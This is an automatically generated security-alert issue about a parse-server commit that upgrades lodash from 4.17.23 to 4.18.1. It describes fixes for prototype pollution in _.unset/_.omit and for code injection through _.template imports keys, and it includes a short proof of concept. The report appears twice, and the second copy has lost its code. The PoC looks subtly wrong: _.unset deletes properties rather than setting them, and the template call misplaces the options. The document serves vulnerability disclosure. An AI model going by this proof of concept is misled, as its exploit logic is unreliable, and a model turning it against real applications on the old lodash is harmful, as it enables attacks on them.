Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 19716ad
Author: Manuel
Date: 2026-04-03T18:01:02Z
Commit Message
fix: Bump lodash from 4.17.23 to 4.18.1 (#10393)
Pull Request
PR: #10393 - fix: Bump lodash from 4.17.23 to 4.18.1
Labels: None
Description:
Bumps [lodash](https://github.com/lodash/lodash) from 4.17.23 to 4.18.1.
Security Fixes
- GHSA-r5fr-rjxr-66jc (high): Code injection via
_.template imports keys. Incomplete patch for CVE-2021-23337. imports keys containing forbidden identifier characters now throw an error.
- GHSA-f23m-r3pf-42rh (medium): Prototype pollution in
_.unset / _.omit via constructor/prototype path traversal. constructor and prototype are now blocked unconditionally as non-terminal path k...
Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
This commit patches prototype pollution vulnerabilities in lodash 4.17.23, specifically in the _.unset and _.omit functions where properties such as constructor and prototype could be traversed and modified, leading to prototype pollution. It also fixes a code injection issue in _.template via imports keys. The update blocks unsafe keys and throws errors on forbidden identifiers, preventing attackers from injecting or overwriting critical JavaScript object prototypes.
Affected Code
_.unset(object, 'constructor.prototype.polluted') // allowed in 4.17.23 leading to prototype pollution
_.template('...',{ imports: { 'constructor': maliciousCode } }) // vulnerable to code injection
Proof of Concept
const _ = require('lodash@4.17.23');
let obj = {};
// Prototype pollution via _.unset
_.unset(obj, 'constructor.prototype.polluted');
console.log({}.polluted === true); // true, polluted the Object prototype
// Code injection via _.template imports keys
try {
_.template('Hello')(null, { imports: { 'constructor': () => { throw new Error('Injected code'); } } });
} catch(e) {
console.log('Code injection triggered:', e.message);
}
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-04-03T18:02:14.355Z
Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 19716ad
Author: Manuel
Date: 2026-04-03T18:01:02Z
Commit Message
Pull Request
PR: #10393 - fix: Bump lodash from 4.17.23 to 4.18.1
Labels: None
Description:
Bumps [lodash](https://github.com/lodash/lodash) from 4.17.23 to 4.18.1.
Security Fixes
_.templateimportskeys. Incomplete patch for CVE-2021-23337.importskeys containing forbidden identifier characters now throw an error._.unset/_.omitviaconstructor/prototypepath traversal.constructorandprototypeare now blocked unconditionally as non-terminal path k...Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
This commit patches prototype pollution vulnerabilities in lodash 4.17.23, specifically in the
_.unsetand_.omitfunctions where properties such asconstructorandprototypecould be traversed and modified, leading to prototype pollution. It also fixes a code injection issue in_.templateviaimportskeys. The update blocks unsafe keys and throws errors on forbidden identifiers, preventing attackers from injecting or overwriting critical JavaScript object prototypes.Affected Code
Proof of Concept
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-04-03T18:02:14.355Z